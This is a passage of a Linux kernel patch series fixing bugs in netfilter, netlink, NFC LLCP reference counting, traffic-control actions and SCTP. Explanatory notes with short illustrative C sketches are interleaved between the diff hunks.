+ 		return -NF_ACCEPT;
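[Note: require_seq48 packs the DCCP packet types that must carry 48-bit sequence numbers into one unsigned long used as a tiny set, and the BUILD_BUG_ON() pins the assumption that every valid type index fits in the word. The same bitmask-as-set technique in isolation:

	#include <linux/bits.h>
	#include <linux/bitops.h>
	#include <linux/build_bug.h>

	enum pkt_type { PKT_A, PKT_B, PKT_C, PKT_MAX };

	static bool needs_long_header(u8 type)
	{
		static const unsigned long wanted = BIT(PKT_A) | BIT(PKT_C);

		BUILD_BUG_ON(PKT_MAX >= BITS_PER_LONG);	/* mask must fit */
		return type < PKT_MAX && test_bit(type, &wanted);
	}
]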
+diff --git a/net/netfilter/nf_conntrack_sip.c b/net/netfilter/nf_conntrack_sip.c
+index 77f5e82d8e3fe..d0eac27f6ba03 100644
+--- a/net/netfilter/nf_conntrack_sip.c
++++ b/net/netfilter/nf_conntrack_sip.c
+@@ -611,7 +611,7 @@ int ct_sip_parse_numerical_param(const struct nf_conn *ct, const char *dptr,
+ 	start += strlen(name);
+ 	*val = simple_strtoul(start, &end, 0);
+ 	if (start == end)
+-		return 0;
++		return -1;
+ 	if (matchoff && matchlen) {
+ 		*matchoff = start - dptr;
+ 		*matchlen = end - start;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 7f71bdbc82672..938cfa9a3adb6 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -2628,7 +2628,7 @@ err:
+ 
+ static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
+ 					       const struct nft_table *table,
+-					       const struct nlattr *nla)
++					       const struct nlattr *nla, u8 genmask)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 	u32 id = ntohl(nla_get_be32(nla));
+@@ -2639,7 +2639,8 @@ static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
+ 
+ 		if (trans->msg_type == NFT_MSG_NEWCHAIN &&
+ 		    chain->table == table &&
+-		    id == nft_trans_chain_id(trans))
++		    id == nft_trans_chain_id(trans) &&
++		    nft_active_genmask(chain, genmask))
+ 			return chain;
+ 	}
+ 	return ERR_PTR(-ENOENT);
+@@ -3629,7 +3630,8 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return -EOPNOTSUPP;
+ 
+ 	} else if (nla[NFTA_RULE_CHAIN_ID]) {
+-		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID]);
++		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID],
++					      genmask);
+ 		if (IS_ERR(chain)) {
+ 			NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
+ 			return PTR_ERR(chain);
+@@ -5139,6 +5141,8 @@ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 		nft_set_trans_unbind(ctx, set);
+ 		if (nft_set_is_anonymous(set))
+ 			nft_deactivate_next(ctx->net, set);
++		else
++			list_del_rcu(&binding->list);
+ 
+ 		set->use--;
+ 		break;
+@@ -10135,7 +10139,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ 						 genmask);
+ 		} else if (tb[NFTA_VERDICT_CHAIN_ID]) {
+ 			chain = nft_chain_lookup_byid(ctx->net, ctx->table,
+-						      tb[NFTA_VERDICT_CHAIN_ID]);
++						      tb[NFTA_VERDICT_CHAIN_ID],
++						      genmask);
+ 			if (IS_ERR(chain))
+ 				return PTR_ERR(chain);
+ 		} else {
+diff --git a/net/netfilter/nft_byteorder.c b/net/netfilter/nft_byteorder.c
+index f952a80275a81..2e2eb2cb17bc7 100644
+--- a/net/netfilter/nft_byteorder.c
++++ b/net/netfilter/nft_byteorder.c
+@@ -30,11 +30,11 @@ void nft_byteorder_eval(const struct nft_expr *expr,
+ 	const struct nft_byteorder *priv = nft_expr_priv(expr);
+ 	u32 *src = &regs->data[priv->sreg];
+ 	u32 *dst = &regs->data[priv->dreg];
+-	union { u32 u32; u16 u16; } *s, *d;
++	u16 *s16, *d16;
+ 	unsigned int i;
+ 
+-	s = (void *)src;
+-	d = (void *)dst;
++	s16 = (void *)src;
++	d16 = (void *)dst;
+ 
+ 	switch (priv->size) {
+ 	case 8: {
+@@ -62,11 +62,11 @@ void nft_byteorder_eval(const struct nft_expr *expr,
+ 		switch (priv->op) {
+ 		case NFT_BYTEORDER_NTOH:
+ 			for (i = 0; i < priv->len / 4; i++)
+-				d[i].u32 = ntohl((__force __be32)s[i].u32);
++				dst[i] = ntohl((__force __be32)src[i]);
+ 			break;
+ 		case NFT_BYTEORDER_HTON:
+ 			for (i = 0; i < priv->len / 4; i++)
+-				d[i].u32 = (__force __u32)htonl(s[i].u32);
++				dst[i] = (__force __u32)htonl(src[i]);
+ 			break;
+ 		}
+ 		break;
+@@ -74,11 +74,11 @@ void nft_byteorder_eval(const struct nft_expr *expr,
+ 		switch (priv->op) {
+ 		case NFT_BYTEORDER_NTOH:
+ 			for (i = 0; i < priv->len / 2; i++)
+-				d[i].u16 = ntohs((__force __be16)s[i].u16);
++				d16[i] = ntohs((__force __be16)s16[i]);
+ 			break;
+ 		case NFT_BYTEORDER_HTON:
+ 			for (i = 0; i < priv->len / 2; i++)
+-				d[i].u16 = (__force __u16)htons(s[i].u16);
++				d16[i] = (__force __u16)htons(s16[i]);
+ 			break;
+ 		}
+ 		break;
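[Note: the byteorder rewrite retires the on-stack union view of the registers: 32-bit lanes are converted straight through the u32 register pointers, and only the 16-bit case casts to a dedicated u16 view, so each size uses exactly one consistent access type. A reduced sketch of the two network-to-host loops:

	#include <linux/types.h>
	#include <asm/byteorder.h>

	static void ntoh_regs(u32 *dst, const u32 *src, unsigned int len,
			      unsigned int size)
	{
		unsigned int i;

		if (size == 4) {
			for (i = 0; i < len / 4; i++)	/* whole 32-bit lanes */
				dst[i] = ntohl((__force __be32)src[i]);
		} else if (size == 2) {
			u16 *d16 = (u16 *)dst;		/* 16-bit view of regs */
			const u16 *s16 = (const u16 *)src;

			for (i = 0; i < len / 2; i++)
				d16[i] = ntohs((__force __be16)s16[i]);
		}
	}
]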
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index 6d493a0ccf399..ed123cf462afe 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1589,6 +1589,7 @@ out:
+ int netlink_set_err(struct sock *ssk, u32 portid, u32 group, int code)
+ {
+ 	struct netlink_set_err_data info;
++	unsigned long flags;
+ 	struct sock *sk;
+ 	int ret = 0;
+ 
+@@ -1598,12 +1599,12 @@ int netlink_set_err(struct sock *ssk, u32 portid, u32 group, int code)
+ 	/* sk->sk_err wants a positive error value */
+ 	info.code = -code;
+ 
+-	read_lock(&nl_table_lock);
++	read_lock_irqsave(&nl_table_lock, flags);
+ 
+ 	sk_for_each_bound(sk, &nl_table[ssk->sk_protocol].mc_list)
+ 		ret += do_one_set_err(sk, &info);
+ 
+-	read_unlock(&nl_table_lock);
++	read_unlock_irqrestore(&nl_table_lock, flags);
+ 	return ret;
+ }
+ EXPORT_SYMBOL(netlink_set_err);
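[Note: both netlink hunks move the nl_table_lock readers from plain read_lock() to read_lock_irqsave()/read_unlock_irqrestore(). The _irqsave variant disables local interrupts and remembers their previous state in the flags word, so the section is safe even if the lock can be contended from (soft)irq context, and the caller's interrupt state is restored exactly as it was. The bare pattern:

	#include <linux/spinlock.h>

	static DEFINE_RWLOCK(table_lock);

	static void walk_table(void)
	{
		unsigned long flags;

		read_lock_irqsave(&table_lock, flags);	/* IRQs off from here */
		/* ... iterate the table; must not sleep ... */
		read_unlock_irqrestore(&table_lock, flags); /* prior state back */
	}
]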
+diff --git a/net/netlink/diag.c b/net/netlink/diag.c
+index c6255eac305c7..e4f21b1067bcc 100644
+--- a/net/netlink/diag.c
++++ b/net/netlink/diag.c
+@@ -94,6 +94,7 @@ static int __netlink_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 	struct net *net = sock_net(skb->sk);
+ 	struct netlink_diag_req *req;
+ 	struct netlink_sock *nlsk;
++	unsigned long flags;
+ 	struct sock *sk;
+ 	int num = 2;
+ 	int ret = 0;
+@@ -152,7 +153,7 @@ static int __netlink_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 	num++;
+ 
+ mc_list:
+-	read_lock(&nl_table_lock);
++	read_lock_irqsave(&nl_table_lock, flags);
+ 	sk_for_each_bound(sk, &tbl->mc_list) {
+ 		if (sk_hashed(sk))
+ 			continue;
+@@ -167,13 +168,13 @@ mc_list:
+ 				 NETLINK_CB(cb->skb).portid,
+ 				 cb->nlh->nlmsg_seq,
+ 				 NLM_F_MULTI,
+-				 sock_i_ino(sk)) < 0) {
++				 __sock_i_ino(sk)) < 0) {
+ 			ret = 1;
+ 			break;
+ 		}
+ 		num++;
+ 	}
+-	read_unlock(&nl_table_lock);
++	read_unlock_irqrestore(&nl_table_lock, flags);
+ 
+ done:
+ 	cb->args[0] = num;
+diff --git a/net/nfc/llcp.h b/net/nfc/llcp.h
+index c1d9be636933c..d8345ed57c954 100644
+--- a/net/nfc/llcp.h
++++ b/net/nfc/llcp.h
+@@ -201,7 +201,6 @@ void nfc_llcp_sock_link(struct llcp_sock_list *l, struct sock *s);
+ void nfc_llcp_sock_unlink(struct llcp_sock_list *l, struct sock *s);
+ void nfc_llcp_socket_remote_param_init(struct nfc_llcp_sock *sock);
+ struct nfc_llcp_local *nfc_llcp_find_local(struct nfc_dev *dev);
+-struct nfc_llcp_local *nfc_llcp_local_get(struct nfc_llcp_local *local);
+ int nfc_llcp_local_put(struct nfc_llcp_local *local);
+ u8 nfc_llcp_get_sdp_ssap(struct nfc_llcp_local *local,
+ 			 struct nfc_llcp_sock *sock);
+diff --git a/net/nfc/llcp_commands.c b/net/nfc/llcp_commands.c
+index 41e3a20c89355..e2680a3bef799 100644
+--- a/net/nfc/llcp_commands.c
++++ b/net/nfc/llcp_commands.c
+@@ -359,6 +359,7 @@ int nfc_llcp_send_symm(struct nfc_dev *dev)
+ 	struct sk_buff *skb;
+ 	struct nfc_llcp_local *local;
+ 	u16 size = 0;
++	int err;
+ 
+ 	local = nfc_llcp_find_local(dev);
+ 	if (local == NULL)
+@@ -368,8 +369,10 @@ int nfc_llcp_send_symm(struct nfc_dev *dev)
+ 	size += dev->tx_headroom + dev->tx_tailroom + NFC_HEADER_SIZE;
+ 
+ 	skb = alloc_skb(size, GFP_KERNEL);
+-	if (skb == NULL)
+-		return -ENOMEM;
++	if (skb == NULL) {
++		err = -ENOMEM;
++		goto out;
++	}
+ 
+ 	skb_reserve(skb, dev->tx_headroom + NFC_HEADER_SIZE);
+ 
+@@ -379,8 +382,11 @@ int nfc_llcp_send_symm(struct nfc_dev *dev)
+ 
+ 	nfc_llcp_send_to_raw_sock(local, skb, NFC_DIRECTION_TX);
+ 
+-	return nfc_data_exchange(dev, local->target_idx, skb,
++	err = nfc_data_exchange(dev, local->target_idx, skb,
+ 				 nfc_llcp_recv, local);
++out:
++	nfc_llcp_local_put(local);
++	return err;
+ }
+ 
+ int nfc_llcp_send_connect(struct nfc_llcp_sock *sock)
+@@ -390,7 +396,8 @@ int nfc_llcp_send_connect(struct nfc_llcp_sock *sock)
+ 	const u8 *service_name_tlv = NULL;
+ 	const u8 *miux_tlv = NULL;
+ 	const u8 *rw_tlv = NULL;
+-	u8 service_name_tlv_length, miux_tlv_length,  rw_tlv_length, rw;
++	u8 service_name_tlv_length = 0;
++	u8 miux_tlv_length,  rw_tlv_length, rw;
+ 	int err;
+ 	u16 size = 0;
+ 	__be16 miux;
+diff --git a/net/nfc/llcp_core.c b/net/nfc/llcp_core.c
+index a27e1842b2a09..f60e424e06076 100644
+--- a/net/nfc/llcp_core.c
++++ b/net/nfc/llcp_core.c
+@@ -17,6 +17,8 @@
+ static u8 llcp_magic[3] = {0x46, 0x66, 0x6d};
+ 
+ static LIST_HEAD(llcp_devices);
++/* Protects llcp_devices list */
++static DEFINE_SPINLOCK(llcp_devices_lock);
+ 
+ static void nfc_llcp_rx_skb(struct nfc_llcp_local *local, struct sk_buff *skb);
+ 
+@@ -141,7 +143,7 @@ static void nfc_llcp_socket_release(struct nfc_llcp_local *local, bool device,
+ 	write_unlock(&local->raw_sockets.lock);
+ }
+ 
+-struct nfc_llcp_local *nfc_llcp_local_get(struct nfc_llcp_local *local)
++static struct nfc_llcp_local *nfc_llcp_local_get(struct nfc_llcp_local *local)
+ {
+ 	kref_get(&local->ref);
+ 
+@@ -169,7 +171,6 @@ static void local_release(struct kref *ref)
+ 
+ 	local = container_of(ref, struct nfc_llcp_local, ref);
+ 
+-	list_del(&local->list);
+ 	local_cleanup(local);
+ 	kfree(local);
+ }
+@@ -282,12 +283,33 @@ static void nfc_llcp_sdreq_timer(struct timer_list *t)
+ struct nfc_llcp_local *nfc_llcp_find_local(struct nfc_dev *dev)
+ {
+ 	struct nfc_llcp_local *local;
++	struct nfc_llcp_local *res = NULL;
+ 
++	spin_lock(&llcp_devices_lock);
+ 	list_for_each_entry(local, &llcp_devices, list)
+-		if (local->dev == dev)
++		if (local->dev == dev) {
++			res = nfc_llcp_local_get(local);
++			break;
++		}
++	spin_unlock(&llcp_devices_lock);
++
++	return res;
++}
++
++static struct nfc_llcp_local *nfc_llcp_remove_local(struct nfc_dev *dev)
++{
++	struct nfc_llcp_local *local, *tmp;
++
++	spin_lock(&llcp_devices_lock);
++	list_for_each_entry_safe(local, tmp, &llcp_devices, list)
++		if (local->dev == dev) {
++			list_del(&local->list);
++			spin_unlock(&llcp_devices_lock);
+ 			return local;
++		}
++	spin_unlock(&llcp_devices_lock);
+ 
+-	pr_debug("No device found\n");
++	pr_warn("Shutting down device not found\n");
+ 
+ 	return NULL;
+ }
+@@ -608,12 +630,15 @@ u8 *nfc_llcp_general_bytes(struct nfc_dev *dev, size_t *general_bytes_len)
+ 
+ 	*general_bytes_len = local->gb_len;
+ 
++	nfc_llcp_local_put(local);
++
+ 	return local->gb;
+ }
+ 
+ int nfc_llcp_set_remote_gb(struct nfc_dev *dev, const u8 *gb, u8 gb_len)
+ {
+ 	struct nfc_llcp_local *local;
++	int err;
+ 
+ 	if (gb_len < 3 || gb_len > NFC_MAX_GT_LEN)
+ 		return -EINVAL;
+@@ -630,12 +655,16 @@ int nfc_llcp_set_remote_gb(struct nfc_dev *dev, const u8 *gb, u8 gb_len)
+ 
+ 	if (memcmp(local->remote_gb, llcp_magic, 3)) {
+ 		pr_err("MAC does not support LLCP\n");
+-		return -EINVAL;
++		err = -EINVAL;
++		goto out;
+ 	}
+ 
+-	return nfc_llcp_parse_gb_tlv(local,
++	err = nfc_llcp_parse_gb_tlv(local,
+ 				     &local->remote_gb[3],
+ 				     local->remote_gb_len - 3);
++out:
++	nfc_llcp_local_put(local);
++	return err;
+ }
+ 
+ static u8 nfc_llcp_dsap(const struct sk_buff *pdu)
+@@ -1517,6 +1546,8 @@ int nfc_llcp_data_received(struct nfc_dev *dev, struct sk_buff *skb)
+ 
+ 	__nfc_llcp_recv(local, skb);
+ 
++	nfc_llcp_local_put(local);
++
+ 	return 0;
+ }
+ 
+@@ -1533,6 +1564,8 @@ void nfc_llcp_mac_is_down(struct nfc_dev *dev)
+ 
+ 	/* Close and purge all existing sockets */
+ 	nfc_llcp_socket_release(local, true, 0);
++
++	nfc_llcp_local_put(local);
+ }
+ 
+ void nfc_llcp_mac_is_up(struct nfc_dev *dev, u32 target_idx,
+@@ -1558,6 +1591,8 @@ void nfc_llcp_mac_is_up(struct nfc_dev *dev, u32 target_idx,
+ 		mod_timer(&local->link_timer,
+ 			  jiffies + msecs_to_jiffies(local->remote_lto));
+ 	}
++
++	nfc_llcp_local_put(local);
+ }
+ 
+ int nfc_llcp_register_device(struct nfc_dev *ndev)
+@@ -1608,7 +1643,7 @@ int nfc_llcp_register_device(struct nfc_dev *ndev)
+ 
+ void nfc_llcp_unregister_device(struct nfc_dev *dev)
+ {
+-	struct nfc_llcp_local *local = nfc_llcp_find_local(dev);
++	struct nfc_llcp_local *local = nfc_llcp_remove_local(dev);
+ 
+ 	if (local == NULL) {
+ 		pr_debug("No such device\n");
+diff --git a/net/nfc/llcp_sock.c b/net/nfc/llcp_sock.c
+index 77642d18a3b43..645677f84dba2 100644
+--- a/net/nfc/llcp_sock.c
++++ b/net/nfc/llcp_sock.c
+@@ -99,7 +99,7 @@ static int llcp_sock_bind(struct socket *sock, struct sockaddr *addr, int alen)
+ 	}
+ 
+ 	llcp_sock->dev = dev;
+-	llcp_sock->local = nfc_llcp_local_get(local);
++	llcp_sock->local = local;
+ 	llcp_sock->nfc_protocol = llcp_addr.nfc_protocol;
+ 	llcp_sock->service_name_len = min_t(unsigned int,
+ 					    llcp_addr.service_name_len,
+@@ -186,7 +186,7 @@ static int llcp_raw_sock_bind(struct socket *sock, struct sockaddr *addr,
+ 	}
+ 
+ 	llcp_sock->dev = dev;
+-	llcp_sock->local = nfc_llcp_local_get(local);
++	llcp_sock->local = local;
+ 	llcp_sock->nfc_protocol = llcp_addr.nfc_protocol;
+ 
+ 	nfc_llcp_sock_link(&local->raw_sockets, sk);
+@@ -696,22 +696,22 @@ static int llcp_sock_connect(struct socket *sock, struct sockaddr *_addr,
+ 	if (dev->dep_link_up == false) {
+ 		ret = -ENOLINK;
+ 		device_unlock(&dev->dev);
+-		goto put_dev;
++		goto sock_llcp_put_local;
+ 	}
+ 	device_unlock(&dev->dev);
+ 
+ 	if (local->rf_mode == NFC_RF_INITIATOR &&
+ 	    addr->target_idx != local->target_idx) {
+ 		ret = -ENOLINK;
+-		goto put_dev;
++		goto sock_llcp_put_local;
+ 	}
+ 
+ 	llcp_sock->dev = dev;
+-	llcp_sock->local = nfc_llcp_local_get(local);
++	llcp_sock->local = local;
+ 	llcp_sock->ssap = nfc_llcp_get_local_ssap(local);
+ 	if (llcp_sock->ssap == LLCP_SAP_MAX) {
+ 		ret = -ENOMEM;
+-		goto sock_llcp_put_local;
++		goto sock_llcp_nullify;
+ 	}
+ 
+ 	llcp_sock->reserved_ssap = llcp_sock->ssap;
+@@ -757,11 +757,13 @@ sock_unlink:
+ sock_llcp_release:
+ 	nfc_llcp_put_ssap(local, llcp_sock->ssap);
+ 
+-sock_llcp_put_local:
+-	nfc_llcp_local_put(llcp_sock->local);
++sock_llcp_nullify:
+ 	llcp_sock->local = NULL;
+ 	llcp_sock->dev = NULL;
+ 
++sock_llcp_put_local:
++	nfc_llcp_local_put(local);
++
+ put_dev:
+ 	nfc_put_device(dev);
+ 
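[Note: after this series of hunks, nfc_llcp_find_local() returns its result with a reference taken under llcp_devices_lock, and unlinking moves into the separate nfc_llcp_remove_local(); every lookup caller, including each error path patched above and below, must therefore balance with nfc_llcp_local_put(). The shape of such a refcounted lookup, sketched with hypothetical names:

	#include <linux/kref.h>
	#include <linux/list.h>
	#include <linux/slab.h>
	#include <linux/spinlock.h>

	struct item {
		struct list_head list;
		struct kref ref;
		int id;
	};

	static LIST_HEAD(items);
	static DEFINE_SPINLOCK(items_lock);

	static void item_release(struct kref *ref)
	{
		kfree(container_of(ref, struct item, ref));
	}

	/* Returns a referenced item; the caller owns one kref_put(). */
	static struct item *item_find(int id)
	{
		struct item *it, *res = NULL;

		spin_lock(&items_lock);
		list_for_each_entry(it, &items, list)
			if (it->id == id) {
				kref_get(&it->ref);	/* pin before unlocking */
				res = it;
				break;
			}
		spin_unlock(&items_lock);
		return res;
	}

Every exit path then ends with kref_put(&it->ref, item_release), mirroring the nfc_llcp_local_put() calls threaded through these hunks.]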
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index b9264e730fd93..e9ac6a6f934e7 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1039,11 +1039,14 @@ static int nfc_genl_llc_get_params(struct sk_buff *skb, struct genl_info *info)
+ 	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+ 	if (!msg) {
+ 		rc = -ENOMEM;
+-		goto exit;
++		goto put_local;
+ 	}
+ 
+ 	rc = nfc_genl_send_params(msg, local, info->snd_portid, info->snd_seq);
+ 
++put_local:
++	nfc_llcp_local_put(local);
++
+ exit:
+ 	device_unlock(&dev->dev);
+ 
+@@ -1105,7 +1108,7 @@ static int nfc_genl_llc_set_params(struct sk_buff *skb, struct genl_info *info)
+ 	if (info->attrs[NFC_ATTR_LLC_PARAM_LTO]) {
+ 		if (dev->dep_link_up) {
+ 			rc = -EINPROGRESS;
+-			goto exit;
++			goto put_local;
+ 		}
+ 
+ 		local->lto = nla_get_u8(info->attrs[NFC_ATTR_LLC_PARAM_LTO]);
+@@ -1117,6 +1120,9 @@ static int nfc_genl_llc_set_params(struct sk_buff *skb, struct genl_info *info)
+ 	if (info->attrs[NFC_ATTR_LLC_PARAM_MIUX])
+ 		local->miux = cpu_to_be16(miux);
+ 
++put_local:
++	nfc_llcp_local_put(local);
++
+ exit:
+ 	device_unlock(&dev->dev);
+ 
+@@ -1172,7 +1178,7 @@ static int nfc_genl_llc_sdreq(struct sk_buff *skb, struct genl_info *info)
+ 
+ 		if (rc != 0) {
+ 			rc = -EINVAL;
+-			goto exit;
++			goto put_local;
+ 		}
+ 
+ 		if (!sdp_attrs[NFC_SDP_ATTR_URI])
+@@ -1191,7 +1197,7 @@ static int nfc_genl_llc_sdreq(struct sk_buff *skb, struct genl_info *info)
+ 		sdreq = nfc_llcp_build_sdreq_tlv(tid, uri, uri_len);
+ 		if (sdreq == NULL) {
+ 			rc = -ENOMEM;
+-			goto exit;
++			goto put_local;
+ 		}
+ 
+ 		tlvs_len += sdreq->tlv_len;
+@@ -1201,10 +1207,14 @@ static int nfc_genl_llc_sdreq(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	if (hlist_empty(&sdreq_list)) {
+ 		rc = -EINVAL;
+-		goto exit;
++		goto put_local;
+ 	}
+ 
+ 	rc = nfc_llcp_send_snl_sdreq(local, &sdreq_list, tlvs_len);
++
++put_local:
++	nfc_llcp_local_put(local);
++
+ exit:
+ 	device_unlock(&dev->dev);
+ 
+diff --git a/net/nfc/nfc.h b/net/nfc/nfc.h
+index de2ec66d7e83a..0b1e6466f4fbf 100644
+--- a/net/nfc/nfc.h
++++ b/net/nfc/nfc.h
+@@ -52,6 +52,7 @@ int nfc_llcp_set_remote_gb(struct nfc_dev *dev, const u8 *gb, u8 gb_len);
+ u8 *nfc_llcp_general_bytes(struct nfc_dev *dev, size_t *general_bytes_len);
+ int nfc_llcp_data_received(struct nfc_dev *dev, struct sk_buff *skb);
+ struct nfc_llcp_local *nfc_llcp_find_local(struct nfc_dev *dev);
++int nfc_llcp_local_put(struct nfc_llcp_local *local);
+ int __init nfc_llcp_init(void);
+ void nfc_llcp_exit(void);
+ void nfc_llcp_free_sdp_tlv(struct nfc_llcp_sdp_tlv *sdp);
+diff --git a/net/sched/act_ipt.c b/net/sched/act_ipt.c
+index 1625e10374161..29974de689ec9 100644
+--- a/net/sched/act_ipt.c
++++ b/net/sched/act_ipt.c
+@@ -47,7 +47,7 @@ static int ipt_init_target(struct net *net, struct xt_entry_target *t,
+ 	par.entryinfo = &e;
+ 	par.target    = target;
+ 	par.targinfo  = t->data;
+-	par.hook_mask = hook;
++	par.hook_mask = 1 << hook;
+ 	par.family    = NFPROTO_IPV4;
+ 
+ 	ret = xt_check_target(&par, t->u.target_size - sizeof(*t), 0, false);
+@@ -84,7 +84,8 @@ static void tcf_ipt_release(struct tc_action *a)
+ 
+ static const struct nla_policy ipt_policy[TCA_IPT_MAX + 1] = {
+ 	[TCA_IPT_TABLE]	= { .type = NLA_STRING, .len = IFNAMSIZ },
+-	[TCA_IPT_HOOK]	= { .type = NLA_U32 },
++	[TCA_IPT_HOOK]	= NLA_POLICY_RANGE(NLA_U32, NF_INET_PRE_ROUTING,
++					   NF_INET_NUMHOOKS),
+ 	[TCA_IPT_INDEX]	= { .type = NLA_U32 },
+ 	[TCA_IPT_TARG]	= { .len = sizeof(struct xt_entry_target) },
+ };
+@@ -157,15 +158,27 @@ static int __tcf_ipt_init(struct net *net, unsigned int id, struct nlattr *nla,
+ 			return -EEXIST;
+ 		}
+ 	}
++
++	err = -EINVAL;
+ 	hook = nla_get_u32(tb[TCA_IPT_HOOK]);
++	switch (hook) {
++	case NF_INET_PRE_ROUTING:
++		break;
++	case NF_INET_POST_ROUTING:
++		break;
++	default:
++		goto err1;
++	}
+ 
+-	err = -ENOMEM;
+-	tname = kmalloc(IFNAMSIZ, GFP_KERNEL);
++	if (tb[TCA_IPT_TABLE]) {
++		/* mangle only for now */
++		if (nla_strcmp(tb[TCA_IPT_TABLE], "mangle"))
++			goto err1;
++	}
++
++	tname = kstrdup("mangle", GFP_KERNEL);
+ 	if (unlikely(!tname))
+ 		goto err1;
+-	if (tb[TCA_IPT_TABLE] == NULL ||
+-	    nla_strscpy(tname, tb[TCA_IPT_TABLE], IFNAMSIZ) >= IFNAMSIZ)
+-		strcpy(tname, "mangle");
+ 
+ 	t = kmemdup(td, td->u.target_size, GFP_KERNEL);
+ 	if (unlikely(!t))
+@@ -216,6 +229,26 @@ static int tcf_xt_init(struct net *net, struct nlattr *nla,
+ 			      a, &act_xt_ops, tp, flags);
+ }
+ 
++static bool tcf_ipt_act_check(struct sk_buff *skb)
++{
++	const struct iphdr *iph;
++	unsigned int nhoff, len;
++
++	if (!pskb_may_pull(skb, sizeof(struct iphdr)))
++		return false;
++
++	nhoff = skb_network_offset(skb);
++	iph = ip_hdr(skb);
++	if (iph->ihl < 5 || iph->version != 4)
++		return false;
++
++	len = skb_ip_totlen(skb);
++	if (skb->len < nhoff + len || len < (iph->ihl * 4u))
++		return false;
++
++	return pskb_may_pull(skb, iph->ihl * 4u);
++}
++
+ static int tcf_ipt_act(struct sk_buff *skb, const struct tc_action *a,
+ 		       struct tcf_result *res)
+ {
+@@ -229,9 +262,22 @@ static int tcf_ipt_act(struct sk_buff *skb, const struct tc_action *a,
+ 		.pf	= NFPROTO_IPV4,
+ 	};
+ 
++	if (skb_protocol(skb, false) != htons(ETH_P_IP))
++		return TC_ACT_UNSPEC;
++
+ 	if (skb_unclone(skb, GFP_ATOMIC))
+ 		return TC_ACT_UNSPEC;
+ 
++	if (!tcf_ipt_act_check(skb))
++		return TC_ACT_UNSPEC;
++
++	if (state.hook == NF_INET_POST_ROUTING) {
++		if (!skb_dst(skb))
++			return TC_ACT_UNSPEC;
++
++		state.out = skb->dev;
++	}
++
+ 	spin_lock(&ipt->tcf_lock);
+ 
+ 	tcf_lastuse_update(&ipt->tcf_tm);
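[Note: tcf_ipt_act() now vets the packet before the xtables target ever sees it: only ETH_P_IP, a pullable linear header, version 4 with IHL >= 5, and a total length that both covers the header and fits the skb. The same IPv4 sanity walk over a raw buffer, as a standalone sketch:

	#include <stdbool.h>
	#include <stddef.h>
	#include <stdint.h>

	static bool ipv4_header_ok(const uint8_t *data, size_t len)
	{
		uint8_t version, ihl;
		size_t total;

		if (len < 20)			/* minimal IPv4 header */
			return false;
		version = data[0] >> 4;
		ihl = data[0] & 0x0f;		/* header len in 32-bit words */
		if (version != 4 || ihl < 5)
			return false;
		total = ((size_t)data[2] << 8) | data[3];	/* tot_len */
		if (total < (size_t)ihl * 4 || total > len)
			return false;
		return true;			/* options, if any, present */
	}
]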
+diff --git a/net/sched/act_pedit.c b/net/sched/act_pedit.c
+index 180669aa9d097..aee2e13f1db62 100644
+--- a/net/sched/act_pedit.c
++++ b/net/sched/act_pedit.c
+@@ -28,6 +28,7 @@ static struct tc_action_ops act_pedit_ops;
+ 
+ static const struct nla_policy pedit_policy[TCA_PEDIT_MAX + 1] = {
+ 	[TCA_PEDIT_PARMS]	= { .len = sizeof(struct tc_pedit) },
++	[TCA_PEDIT_PARMS_EX]	= { .len = sizeof(struct tc_pedit) },
+ 	[TCA_PEDIT_KEYS_EX]   = { .type = NLA_NESTED },
+ };
+ 
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index bc3d08bd7cef3..c806d272107ac 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -363,9 +363,9 @@ static void sctp_auto_asconf_init(struct sctp_sock *sp)
+ 	struct net *net = sock_net(&sp->inet.sk);
+ 
+ 	if (net->sctp.default_auto_asconf) {
+-		spin_lock(&net->sctp.addr_wq_lock);
++		spin_lock_bh(&net->sctp.addr_wq_lock);
+ 		list_add_tail(&sp->auto_asconf_list, &net->sctp.auto_asconf_splist);
+-		spin_unlock(&net->sctp.addr_wq_lock);
++		spin_unlock_bh(&net->sctp.addr_wq_lock);
+ 		sp->do_auto_asconf = 1;
+ 	}
+ }
+@@ -8279,6 +8279,22 @@ static int sctp_getsockopt(struct sock *sk, int level, int optname,
+ 	return retval;
+ }
+ 
++static bool sctp_bpf_bypass_getsockopt(int level, int optname)
++{
++	if (level == SOL_SCTP) {
++		switch (optname) {
++		case SCTP_SOCKOPT_PEELOFF:
++		case SCTP_SOCKOPT_PEELOFF_FLAGS:
++		case SCTP_SOCKOPT_CONNECTX3:
++			return true;
++		default:
++			return false;
++		}
++	}
++
++	return false;
++}
++
+ static int sctp_hash(struct sock *sk)
+ {
+ 	/* STUB */
+@@ -9643,6 +9659,7 @@ struct proto sctp_prot = {
+ 	.shutdown    =	sctp_shutdown,
+ 	.setsockopt  =	sctp_setsockopt,
+ 	.getsockopt  =	sctp_getsockopt,
++	.bpf_bypass_getsockopt	= sctp_bpf_bypass_getsockopt,
+ 	.sendmsg     =	sctp_sendmsg,
+ 	.recvmsg     =	sctp_recvmsg,
+ 	.bind        =	sctp_bind,
+@@ -9698,6 +9715,7 @@ struct proto sctpv6_prot = {
+ 	.shutdown	= sctp_shutdown,
